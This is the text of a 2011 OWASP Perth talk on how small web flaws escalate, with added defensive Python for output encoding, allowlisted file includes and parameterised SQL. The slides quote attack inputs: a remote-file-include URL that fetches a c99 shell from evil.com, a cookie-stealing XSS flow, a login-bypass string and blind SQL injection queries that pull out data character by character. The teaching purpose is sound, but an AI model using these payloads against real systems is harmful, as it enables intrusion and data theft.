Page 1
ANZTB SIGIST May 2011
Perth OWASP
How minor vulnerabilities can do "very bad things" ™
Christian Frichot / David Taylor
(Some of) Perth OWASP's Chapter Leads
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org
Wednesday 25th May 2011

Page 2
Introductions
Photo of handshake removed to reduce file size.

Page 3
Why we think this is important.

Page 4
Impact Crater

Page 5
Photo of bored cat removed to reduce file size.
*bored cat

Page 6
Photo of scared cat removed to reduce file size.
*scared cat is scared

Page 7
Overview
• Overview of the evening
• From XSS to total session compromise
• Would you like some BeEF with your XSS?
• Remote File Include, an attacker's best friend.
• When RFI met Metasploit
• Useful SQL Injection

Page 8
A Brief History Of…

Page 9
Cross Site Scripting (XSS)
"XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites."
What does this mean?
• Attackers can execute scripts within a user's browser.
• This may lead to defacement, session hijacking, browser redirection or even the installation of malware.

Page 10
Reflective XSS
(Diagram: Attacker, Authenticated User, Vulnerable App, Evil Server)
1. Attacker sends the authenticated user a message: "Hi Joe, We've noticed you haven't updated your phone number. Click here to proceed. Thanks."
2. XSS script forces the browser to submit document.cookie to the Evil Server.
3. document.cookie is sent to the Evil Server.
4. Attacker collects cookies.

Page 11
Stored XSS
(Diagram: Attacker, Authenticated User, Vulnerable App, Evil Server)
1. Attacker posts a comment on the blog, including XSS.
2. Authenticated user visits the blog.
3. document.cookie is sent to the Evil Server.
4. Attacker collects cookies.
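The two diagrams above share one root cause (untrusted data written into the page unencoded) and one payoff for the attacker (a script that can read document.cookie). The following Python is an added example, not code from the slides or from OWASP: it contrasts the vulnerable rendering pattern with output encoding for the HTML body and attribute contexts, and shows the cookie flags that keep the session token out of document.cookie even when a script does run. The comment string, cookie name SESSIONID and link helper are constructed for the demonstration.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input: a blog comment carrying the kind of script the
# stored-XSS slide describes (it reads document.cookie once the page renders it).
ATTACKER_COMMENT = "Nice post! <script>alert(document.cookie)</script>"


def render_comment_unsafe(comment: str) -> str:
    """The vulnerable pattern: untrusted data is placed straight into HTML."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """Output encoding for an HTML body context: every character that can
    start markup (< > & " ') becomes a character reference, so the browser
    displays the comment as text instead of executing it."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_link_safe(label: str, href: str) -> str:
    """Attribute context needs the same treatment; quote=True also encodes
    the quote characters that would let a value break out of the attribute.
    Only http(s) URLs are accepted so a javascript: URL cannot arrive via href."""
    if not href.startswith(("http://", "https://")):
        raise ValueError("unsupported URL scheme")
    return (f'<a href="{html.escape(href, quote=True)}">'
            f'{html.escape(label, quote=True)}</a>')


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session token. HttpOnly keeps it out of
    document.cookie, so a script that does run cannot simply read and
    submit it; Secure and SameSite limit where the browser sends it."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = session_id
    cookie["SESSIONID"]["httponly"] = True
    cookie["SESSIONID"]["secure"] = True
    cookie["SESSIONID"]["samesite"] = "Lax"
    cookie["SESSIONID"]["path"] = "/"
    return cookie["SESSIONID"].OutputString()


def contains_raw_script(rendered_html: str) -> bool:
    """Crude check used only for the demonstration: is there still an
    unencoded <script tag in the page we are about to send?"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print(render_comment_unsafe(ATTACKER_COMMENT))
    print(render_comment_safe(ATTACKER_COMMENT))
    print(session_cookie_header("constructed-session-id"))
```

Encoding is context specific: `html.escape` is right for text nodes and quoted attributes, but a value placed inside a script block or a URL needs the encoding for that context instead. HttpOnly does not stop XSS; it removes the easiest way to turn an XSS into the session compromise the slides build towards.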

Page 12
Injection
"Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or access unauthorised data."
What does this mean?
• Injection can result in data loss or corruption, lack of accountability, or denial of access.
• In worst case scenarios it can lead to complete host takeover.

Page 13
Setting the scene
• Your developers create a Secure Cloud Open Access Tool™
• Secure portal for exchanging files with customers.
• Your company, Acme, take their information very seriously, as most of their intellectual property is contained within.

Page 14
This slide left intentionally blank

Page 15
Conclusions from Session Compromise
• According to the OWASP Top 10 of 2010, XSS is the most prevalent web application security flaw.
• The Web Hacking Incident Database (WHID) lists XSS as the 3rd top attack method.[1]
• Detecting XSS is easy.
  • Open Source: w3af, rat, XSSscan.py, XSSFuzz etc
  • Mixed Source: Burp! (If you buy one piece of software, buy this)
  • Bling ($$) Source: IBM AppScan, HP WebInspect, NTOSpider
[1] http://www.xiom.com/whid

Page 17
Session Compromise
Photo of person removed to reduce file size.

Page 19
Browser Exploitation Framework
Photo of meat removed to reduce file size.

Page 21
(insert demo here)

Page 22
Conclusions from BeEF injection ;)
• Why do things manually, when you can do them automagically?
• The web browser IS the operating system.
• Clearly demonstrates how a fairly trivial vulnerability can explode into something larger…

Page 24
(insert break here)

Page 26
Photo of Nano car removed to reduce file size.
*Planet's cheapest car, the Nano.

Page 27
Photo of Bentley Coupe removed to reduce file size.
*This is a Bentley Coupe != planet's cheapest car
But how does an attacker deface a website?
�RFI or Remote File Inclusion
�Was in OWASP’s Top 10 in 2007
�Used to be highly prevalent in PHP until the default configuration was changed
�Exploits the require or include functions, eg:
OWASP
�Exploits the require or include functions, eg:
�Include $_GET[‘option’]
http://www.acme.com/scoat.php?language=http://evil.com/c99.txt
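The fix for the pattern on this slide is not to sanitise the URL but to never build an include path from the request at all: treat the parameter as a key into a fixed set of files the application ships. The PHP configuration change the slide refers to is allow_url_include, which has defaulted to Off since PHP 5.2. The following Python is an added example, not code from the slides; it stands in for the PHP include with a file read, uses a constructed language directory so it runs offline, and names the reason a value was rejected so the rejection can be logged and alerted on.

```python
import tempfile
from pathlib import Path
from typing import Dict

# Constructed allowlist: the language codes the application actually ships.
ALLOWED_LANGUAGES = {"en", "de", "fr"}


def make_demo_language_dir() -> Path:
    """Create a throwaway directory with one strings file per language so the
    example runs without the real application (constructed test data)."""
    root = Path(tempfile.mkdtemp(prefix="scoat-lang-"))
    for code in ALLOWED_LANGUAGES:
        (root / f"{code}.txt").write_text(f"greeting={code}:hello\n")
    return root


def classify_language_param(requested: str) -> str:
    """Return 'ok' or the reason the value is rejected. The classification is
    only for logging; the allowlist membership check alone decides access."""
    if "://" in requested or requested.startswith("//"):
        return "remote-url"          # the slide's http://evil.com/... case
    if "/" in requested or "\\" in requested or ".." in requested:
        return "path-traversal"      # local file inclusion attempts
    if requested not in ALLOWED_LANGUAGES:
        return "unknown-language"
    return "ok"


def load_language_safe(lang_dir: Path, requested: str) -> str:
    """Load the strings file for a validated language code.

    The path is built from the validated code, never from the raw parameter,
    and is resolved and checked to lie inside lang_dir as a second line of
    defence should the allowlist ever be edited carelessly."""
    verdict = classify_language_param(requested)
    if verdict != "ok":
        raise ValueError(f"rejected language parameter ({verdict})")
    root = lang_dir.resolve()
    path = (root / f"{requested}.txt").resolve()
    if root not in path.parents:
        raise ValueError("resolved path escapes the language directory")
    return path.read_text()


def audit_requests(values: list) -> Dict[str, int]:
    """Count rejection reasons over a batch of observed parameter values,
    the kind of tally a log review would produce."""
    counts: Dict[str, int] = {}
    for value in values:
        verdict = classify_language_param(value)
        counts[verdict] = counts.get(verdict, 0) + 1
    return counts


if __name__ == "__main__":
    lang_dir = make_demo_language_dir()
    print(load_language_safe(lang_dir, "en"))
    # Constructed sample of parameter values seen in a log.
    print(audit_requests(["en", "fr", "http://evil.com/c99.txt", "../../config.txt", "es"]))
```

Running it prints the English strings and a tally such as {'ok': 2, 'remote-url': 1, 'path-traversal': 1, 'unknown-language': 1}. A single remote-url rejection in production logs is worth an alert on its own: legitimate clients never send one.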

Page 32
(insert scariness here)

Page 33
Conclusions
• The web is a great channel for exploiting PCs
• Google's research back in 2007 highlighted:
  • "One in 10 web pages contained malicious code"
• F-Secure 2010:
  • "Adobe Reader files were exploited in almost 49% of targeted attacks in 2009"
• Keep your applications up to date!

Page 35
SQL Injection
• The login page of the application is vulnerable to SQL Injection:
  SELECT $id FROM dt_users WHERE user='$user' AND pass='$pass'
• What happens if we make the username:
  jdoe' AND 1=1 --
• The SQL becomes…
  SELECT $id FROM dt_users WHERE user='jdoe' AND 1=1 -- ' AND pass='$pass'

Page 36
Blind SQL Injection
• So, we can log into the app without a password - pretty cool.
• But what if we want to mess with the database some more?
• The SQL Injection is "blind" because none of the results from the SELECT are echoed to the browser.

Page 37
Taking Over The World, 1 Bit At A Time
• Essentially we can get 1 bit of data from the database at a time:
  • If the trailing condition evaluates to TRUE, the application gets logged in.
  • If the trailing condition evaluates to FALSE you get the password error message.
• For example:
  SELECT $id FROM dt_users WHERE user='jdoe' AND 1<2 --   (TRUE)
  SELECT $id FROM dt_users WHERE user='jdoe' AND 1>2 --   (FALSE)
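Slides 35 to 37 can be reproduced against a throwaway database. The following Python is an added example, not code from the slides: it builds the slide's login query by string concatenation beside the parameterised form, and shows that the same username either bypasses the password or is compared as a plain (non-existent) user name. The in-memory SQLite table, the user jdoe and its password are constructed; a real application would store a salted password hash rather than the clear text the slide's query compares.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's user table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dt_users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT)")
    conn.execute("INSERT INTO dt_users (user, pass) VALUES ('jdoe', 'constructed-secret')")
    conn.commit()
    return conn


def login_unsafe(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """The slide's pattern: the query text is assembled from the form fields,
    so a quote in the username changes the query instead of the data."""
    sql = f"SELECT id FROM dt_users WHERE user='{user}' AND pass='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, user: str, password: str) -> bool:
    """Parameterised query: the SQL text is fixed and the values travel
    separately, so the whole username is compared as one literal string."""
    sql = "SELECT id FROM dt_users WHERE user=? AND pass=?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def trailing_condition_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Slide 37 on the unsafe login: with the username  jdoe' AND <condition> --
    the login outcome reveals whether <condition> is true, one bit per request."""
    return login_unsafe(conn, f"jdoe' AND {condition} --", "anything")


if __name__ == "__main__":
    db = make_demo_db()
    payload = "jdoe' AND 1=1 --"
    print("unsafe login with payload:", login_unsafe(db, payload, "wrong"))  # True
    print("safe login with payload:  ", login_safe(db, payload, "wrong"))    # False
    print("oracle 1<2:", trailing_condition_oracle(db, "1<2"))               # True
    print("oracle 1>2:", trailing_condition_oracle(db, "1>2"))               # False
```

The parameterised version does not need to know what an attacker might type: the database driver never parses the username as SQL, so the `--` comment and the injected condition are just characters that fail to match any user.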

Page 38
Let's take a short detour… Binary Search
Photo of detour sign removed to reduce file size.

Page 39
Detour: Binary Search

Page 40
Detour: Binary Search
• Example: Searching for an ASCII character
  • Is character < ASCII code 128? Yes
  • Is character < ASCII code 64? No
  • Is character < ASCII code 96? Yes
  • Is character < ASCII code 80? No
  • Is character < ASCII code 88? No
  • Is character < ASCII code 92? Yes
  • Is character < ASCII code 90? Yes
  • Is character < ASCII code 89? No
• Character is ASCII 89! ('X')

Page 41
Detour: Binary Search
• Each step in a binary search requires 1 bit of information.
• We have a SQL Injection bug that reveals 1 bit of information at a time.
• "Binary search, meet Blind SQL Injection. Blind SQL Injection, this is Binary Search."
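The detour's question sequence is a plain binary search over the interval [0, 128) with one extra check that the value is 7-bit at all. The following Python is an added example, not code from the slides: it reproduces the slide's eight questions for ASCII 89 (which is 'Y'; 'X' is 88) and then generalises to a whole string, counting the questions asked. The oracle is a constructed local function rather than a database, so the example runs offline; the function names and the sample string are assumptions for the demonstration.

```python
from typing import Callable, List, Tuple

Question = Tuple[int, bool]  # (threshold asked about, answer to "value < threshold?")


def binary_search_ascii(is_less_than: Callable[[int], bool]) -> Tuple[int, List[Question]]:
    """Recover a 7-bit ASCII value from yes/no answers to "is it < n?".
    Mirrors the slide: one check that the value is below 128, then halve the
    remaining interval until a single value is left. Returns the value and
    the questions asked so the sequence can be compared with the slide."""
    asked: List[Question] = []

    def ask(n: int) -> bool:
        answer = is_less_than(n)
        asked.append((n, answer))
        return answer

    if not ask(128):
        raise ValueError("value is not 7-bit ASCII")
    lo, hi = 0, 128  # invariant: lo <= value < hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if ask(mid):
            hi = mid
        else:
            lo = mid
    return lo, asked


def make_local_oracle(secret: str) -> Callable[[int, int], bool]:
    """Stand-in for the blind injection oracle: answers "is the character at
    position pos < n?" from a constructed local string rather than from a
    database."""
    return lambda pos, n: ord(secret[pos]) < n


def recover_string(length: int, is_less_than_at: Callable[[int, int], bool]) -> Tuple[str, int]:
    """Apply the character search position by position (the slides' "and so on"
    for SUBSTRING(..., 2, 1), (..., 3, 1), ...). Also returns the total number
    of questions, i.e. the number of requests this would cost: 8 per character,
    which is why the later slide calls the technique noisy and why a burst of
    near-identical login attempts for one user is a useful detection signal."""
    chars: List[str] = []
    total = 0
    for pos in range(length):
        value, asked = binary_search_ascii(lambda n, p=pos: is_less_than_at(p, n))
        chars.append(chr(value))
        total += len(asked)
    return "".join(chars), total


if __name__ == "__main__":
    value, asked = binary_search_ascii(lambda n: 89 < n)
    for n, answer in asked:
        print(f"Is character < ASCII code {n}? {'Yes' if answer else 'No'}")
    print(f"Character is ASCII {value} ({chr(value)!r})")
    text, requests = recover_string(len("v1.0-demo"), make_local_oracle("v1.0-demo"))
    print(text, "recovered with", requests, "questions")
```

Every character costs exactly 8 questions (1 range check plus 7 halvings of a 128-wide interval), so a 40-character value costs 320 requests to the login page, all from one source and differing only in a number. That regularity is what a web application firewall or a login-rate monitor can key on.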

Page 42
Blind SQL Injection
• Setting it up…
SELECT version()
CAST((SELECT version()) AS CHAR(4000))
SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1)
SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1))

Page 43
Blind SQL Injection
• Putting it into action…
SELECT … WHERE user='jdoe' AND 128>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1)))
SELECT … WHERE user='jdoe' AND 64>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1)))
SELECT … WHERE user='jdoe' AND 96>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),1,1)))
And so on… And so on… And so on… And THEN…
SELECT … WHERE user='jdoe' AND 128>(SELECT ASCII(SUBSTRING(CAST((SELECT version()) AS CHAR(4000)),2,1)))
And so on… And so on… And so on… And so on…

Page 44
Blind SQL Injection
Luckily there are tools to do this for us.
(insert pwnage here)

Page 45
Conclusions (BSQLi)
• Tiny little blind SQL injection bugs can (eventually) leak your entire database
• BSQLi bugs are pretty hard to find (unless you've got the source code)
• Even after you've found them, they are reasonably difficult (and noisy) to exploit
• Validate inputs and use parameterised queries

Page 46
No tools were harmed in the making of this presentation…
• BeEF (http://www.bindshell.net/tools/beef/)
• Metasploit Framework (http://www.metasploit.com/)
• SQLMap (http://sqlmap.sourceforge.net/)
• SQL Power Injector *not demonstrated (http://www.sqlpowerinjector.com/)
• Burp Suite Professional (http://portswigger.net/burp/)

Page 47
Photo of many spanners removed to reduce file size.

Page 50
OWASP Enterprise Security API (ESAPI)
• Don't write your own security controls!
• Reinventing the wheel when it comes to developing security controls for every web application or web service leads to wasted time and massive security holes

Page 51
ESAPI – not just about preventing XSS/SQLi
• Authentication
• Access Control
• Input Validation
• Output encoding/escaping
• Cryptography
• Error handling and logging
• Communication security
• HTTP security
• Security configuration

Page 52
OWASP's Development Guide
• Allow businesses, developers, designers and solution architects to produce secure web applications

Page 55
Wrapping it up
• Relatively innocuous bugs can be leveraged to do bad things (to the client or the server)
• Weaponised exploitation frameworks and tools currently exist
• Secure coding practices and security assessments to minimise exposure

Page 56
Photo of large question mark removed to reduce file size.